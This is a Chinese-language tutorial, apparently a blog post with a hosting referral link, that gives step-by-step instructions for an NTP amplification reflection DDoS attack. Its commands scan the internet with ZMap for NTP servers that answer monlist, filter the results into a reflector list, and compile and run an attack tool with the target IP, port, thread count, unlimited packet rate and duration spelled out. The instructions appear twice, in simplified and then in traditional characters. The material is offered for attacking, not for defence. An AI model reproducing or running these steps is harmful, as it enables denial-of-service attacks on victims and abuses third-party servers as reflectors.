NTP放大反射攻擊掃描列表教程
搬瓦工注册链接:精品稳定服务器购买
更新您的服务器
yum -y update
安装repositorys
CentOS 6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
Centos 7:
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-8.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
安装依赖环境
yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
安装ZMAP
yum -y install zmap
ntpchecker—上传到你的服务器
ntp_123_monlist.pkt—上传到你的服务器
开始扫描放大列表
screen zmap -p 123 -M udp –probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
这个过程相当长的请等待。
给ntpchecker权限
chmod 777 ntpchecker
运行检查
screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
过滤列表
awk \’$2>419{print $1}\’ step1.txt | sort -n | uniq | sort -R > ntpamp.txt
编译与攻击
服务器终端和类型
yum install gcc libcap libpcap libpcap-devel
编译脚本
gcc -lpthread ntp.c -lpcap -o ntp
./ntp 127.0.0.1 80 ntpamp.txt 1500 -1 100
攻击命令解释
127.0.0.1=目标IP
80=攻击端口
ntpamp.txt=过滤后的放大列表
1500=线程
-1=pps限制,-1表示无限制
100=攻击时间
1.升級所有包,改變軟體設定和系統設定,系統版本核心都升級
yum -y update
2.下載rpm包(區分centos6 與centos7 執行不同的命令)
centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm
3.安裝必要的依賴環境
yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
——————————————–掃描過濾列表———————————————–
4.安裝Zmap
wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
tar -zxvf v1.0.3.tar.gz
cd /root/zmap-1.0.3
cd src/
make
make install
ZMap安裝完成,可以執行如下命令測試:
zmap -p 80 -N 10 -B 1M -o – #很快,程式會輸出10個Internet上打開了80埠的主機的IP,你也可以換成22埠23埠試試。具體的用法可以參考ZMap官方文件。
5.開始掃描NTP放大列表
screen zmap -p 123 -M udp –probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
如果在掃描時,你與伺服器的會話不小心中斷。
你可以重新連線伺服器。
使用命令screen -r回到會話。
screen是將程式獨立執行在後臺,直到執行完成。
6.過濾列表
chmod 777 ntpchecker #新增許可權
screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #執行檢查
awk \’$2>419{print $1}\’ step1.txt | sort -n | uniq | sort -R > ntpamp.txt #過濾列表
——————————————–放大攻擊———————————————–
工具下載至本文:https://www.cnblogs.com/a1d4m/p/10051969.html
7.攻擊命令
chmod 777 ntp #賦予許可權
./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100
搬瓦工注册链接:精品稳定服务器购买